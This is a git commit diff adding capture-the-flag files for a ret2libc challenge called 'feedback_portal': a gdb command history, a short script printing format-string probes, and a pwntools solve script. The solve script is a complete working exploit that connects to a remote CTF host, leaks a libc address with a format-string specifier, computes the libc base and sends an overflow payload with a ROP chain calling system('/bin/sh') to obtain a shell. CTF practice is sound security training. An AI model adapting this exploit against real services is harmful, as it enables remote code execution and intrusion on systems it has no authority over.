Second CTFs part

2026-05-10 20:42:33 +02:00
parent 5635246581
commit 9f240eba3b
87 changed files with 404506 additions and 0 deletions
--- a/ret2libc/03_feedback_portarl/.gdb_history
+++ b/ret2libc/03_feedback_portarl/.gdb_history
@@ -0,0 +1,109 @@
+r
+r
+quit
+r
+quit
+ls
+disass main
+disass setup
+disass vuln
+b vuln
+r
+quit
+disass vuln
+b vuln
+r
+c
+r
+c
+r
+c
+r
+c
+r
+c
+r
+r
+c
+r
+c
+p $sp
+p $rsp
+r
+p $sp
+p $sp+1
+p $sp+8
+r
+r
+r
+quit
+b vuln
+r
+p $sp
+p $sp+8
+p $sp
+p x/10x $sp
+x/10x $sp
+x/20x $sp
+disass main
+disass vuln
+disass setup
+disass vuln
+r
+r
+c
+r
+c
+r
+c
+r
+c
+finish
+9$lx
+finish
+finish
+n
+r
+c
+xinfo 7ffff7e0a4a0
+xinfo 0x7ffff7e0a4a0
+stack
+x/10i 0x7ffff7e0a4a0
+r
+c
+r
+%9$lx
+c
+stack
+quit
+b vuln
+r
+%9$lx
+c
+r
+%20$lx.%21$lx.%22$lx.%23$lx.%24%lx
+c
+r
+c
+r
+
+r
+r
+r
+r
+r
+b vuln
+r
+stack
+disass main
+r
+c
+r
+
+r
+c
+r
+r
+c
+r
+c
--- a/ret2libc/03_feedback_portarl/feedback_portal
+++ b/ret2libc/03_feedback_portarl/feedback_portal
--- a/ret2libc/03_feedback_portarl/find_ret.py
+++ b/ret2libc/03_feedback_portarl/find_ret.py
@@ -0,0 +1,2 @@
+for i in range(45,55):
+    print(f"%{i}$lx.", end="")
--- a/ret2libc/03_feedback_portarl/libc.so.6
+++ b/ret2libc/03_feedback_portarl/libc.so.6
--- a/ret2libc/03_feedback_portarl/solve.py
+++ b/ret2libc/03_feedback_portarl/solve.py
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+context.binary = elf = ELF('./feedback_portal', checksec=False)
+# Change if on server
+
+libc = ELF('libc.so.6', checksec=False)
+#libc = ELF('/usr/lib/libc.so.6', checksec=False)
+OFFSET_TO_RIP = 128 + 8
+RET = 0x40101a
+#libc_call = libc.sym['__libc_start_main']
+libc_call = 0x29d90
+# local libc
+#POP_RDI = 0x10269a
+# remote libc
+POP_RDI = 0x10f78b
+BINSH = next(libc.search(b'/bin/sh\x00'))
+
+#p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13595)
+
+p.recvuntil(b'Please enter your name:\n')
+# __libc_start_main (non funziona in remoto)
+#p.sendline(b"%47$lx")
+# __libc_start_call_main
+p.sendline(b"%25$lx")
+
+libc_start_main = p.recvline().split(b',')[1].strip()
+libc_start_main = b'0x' + libc_start_main
+libc_start_main = int(libc_start_main, 16)
+
+#libc_address = libc_start_main - libc_call - 128 - 8
+print(f"Libc start main dropped:{hex(libc_start_main)}")
+print(f"Libc start main from symbol:{hex(libc_call)}")
+print(f"BINSH:{hex(BINSH)}")
+libc_address = (libc_start_main - libc_call) & ~0xfff
+print(f"Addr: {hex(libc_address)}")
+libc.address = libc_address
+print(p.recvuntil(b'Now leave your feedback:\n'))
+payload = flat(
+        b'A' * OFFSET_TO_RIP,
+        p64(RET),
+        #elf.symbols["main"],
+        p64(libc_address + POP_RDI),
+        p64(libc_address + BINSH),
+        libc.symbols["system"]
+        )
+p.send(payload)
+#print(p.recvline())
+p.interactive()